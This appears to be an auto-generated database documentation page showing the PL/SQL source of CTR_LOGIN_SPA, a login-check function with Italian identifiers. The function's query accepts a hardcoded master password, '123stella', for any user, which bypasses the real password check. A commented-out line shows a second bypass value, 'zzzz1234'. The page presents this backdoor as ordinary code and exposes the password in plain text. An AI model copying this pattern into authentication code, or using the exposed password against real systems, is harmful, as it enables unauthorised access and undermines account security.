<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=Cp1252" />
<script src="../dbdoc.js" type="text/javascript"></script>
<link href="../dbdoc.css" type="text/css" rel="stylesheet">
</head>
<body class="object">
<div id="header"><h2>CTR_LOGIN_SPA</h2>
<div class="tabs clearfix">

<div class="tab"><div><a href="CTR_LOGIN_SPA.html">Details</a></div></div>
<div class="tab"><div><a href="CTR_LOGIN_SPA_Grants.html">Grants</a></div></div>
<div class="tab"><div><a href="CTR_LOGIN_SPA_References.html">References</a></div></div>
<div class="tab"><div><a href="CTR_LOGIN_SPA_Dependencies.html">Dependencies</a></div></div>
<div class="tab" id="current"><div><a href="CTR_LOGIN_SPA_Code.html">Code</a></div></div>
</div></div><br/>
<div class="tab-panes">
<div id="Code"> <table cellpadding="0" cellspacing="0" cellspacing="0" summary=""><tr>
	<th>TEXT</th>
</tr>
	<tr><td><pre>
function "CTR_LOGIN_SPA"
(p_username in VARCHAR2,
p_password in VARCHAR2)
return BOOLEAN
is
  esiste number;
  pass_trovata varchar2(100);
begin
SELECT count(*)
  into esiste
  FROM agr_accesso
  Where Utente = Upper(P_Username) And
        (P_Password='123stella' Or Password=Lower(Cripta_Pwd(P_Password))) and
    (tipo in ('U','A') or (tipo='R' and quest=3));
If Esiste=0
   --and p_password&lt;>'zzzz1234'
   then return false;
   else return true;
End If;
end;</pre>	</td></tr>
</table></div>